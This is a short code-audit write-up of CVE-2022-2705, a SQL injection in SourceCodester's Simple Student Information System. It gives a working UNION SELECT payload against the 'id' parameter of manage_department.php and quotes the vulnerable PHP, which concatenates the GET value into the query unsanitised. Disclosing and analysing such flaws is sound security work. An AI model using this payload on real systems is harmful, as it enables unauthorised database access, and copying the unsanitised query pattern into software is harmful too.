Headline
CVE-2022-2705: PHP代码审计—Simple Student Information System SQL Injection
A vulnerability was found in SourceCodester Simple Student Information System. It has been rated as critical. This issue affects some unknown processing of the file admin/departments/manage_department.php. The manipulation of the argument id with the input -5756%27%20UNION%20ALL%20SELECT%20NULL,database(),user(),NULL,NULL,NULL,NULL–%20- leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205829 was assigned to this vulnerability.
Vendor Homepage:
https://www.sourcecodester.com
Source Code Download:
Simple Student Information System
Payload
Simple Student Information System SQL Injection
http://192.168.1.8/sis/admin/departments/manage_department.php?id=-5756%27%20UNION%20ALL%20SELECT%20NULL,database(),user(),NULL,NULL,NULL,NULL--%20-
源码分析
admin/departments/manage_department.php 文件第1-13行,
根据代码可知,使用GET方法,获取了 id 参数,
并且未进行过滤直接拼接到SQL语句,造成SQL 注入漏洞
<?php
require_once('../../config.php');
if(isset($_GET['id'])){
$qry = $conn->query("SELECT * FROM `department_list` where id = '{$_GET['id']}'");
if($qry->num_rows > 0){
$res = $qry->fetch_array();
foreach($res as $k => $v){
if(!is_numeric($k))
$$k = $v;
}
}
}
?>